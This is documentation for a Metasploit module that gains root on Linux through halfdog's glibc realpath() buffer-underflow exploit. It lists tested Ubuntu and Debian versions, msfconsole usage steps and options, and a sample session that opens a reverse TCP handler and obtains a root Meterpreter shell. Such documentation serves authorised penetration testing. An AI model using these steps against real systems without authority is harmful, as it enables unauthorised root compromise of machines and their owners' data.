Brendan Coles
2.0 KiB
Description
This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior.
This module uses halfdog's RationalLove exploit to exploit a buffer
underflow in glibc realpath() and create a SUID root shell. The exploit
has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.
The target system must have unprivileged user namespaces enabled.
Vulnerable Application
This module has been tested successfully on:
- Ubuntu Linux 16.04.3 (x86_64) with glibc version
2.23-0ubuntu9 - Debian 9.0 (x86_64) with glibc version
2.24-11+deb9u1
Verification Steps
- Start
msfconsole - Get a session
use exploit/linux/local/glibc_realpath_priv_escset SESSION [SESSION]checkrun- You should get a new root session
Options
SESSION
Which session to use, which can be viewed with sessions
WritableDir
A writable directory file system path. (default: /tmp)
COMPILE
Options: Auto True False (default: Auto)
Whether the exploit should be live compiled with gcc on the target system,
or uploaded as a pre-compiled binary.
Auto will first determine if gcc is installed to compile live on the system,
and fall back to uploading a pre-compiled binary.
Scenarios
msf5 > use exploit/linux/local/glibc_realpath_priv_esc
msf5 exploit(linux/local/glibc_realpath_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/glibc_realpath_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Writing '/tmp/.DhRxy0FQR.c' (35470 bytes) ...
[*] Writing '/tmp/.Piya56UZVV' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 172.16.191.171
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.171
OS : Ubuntu 16.04 (Linux 4.10.0-28-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux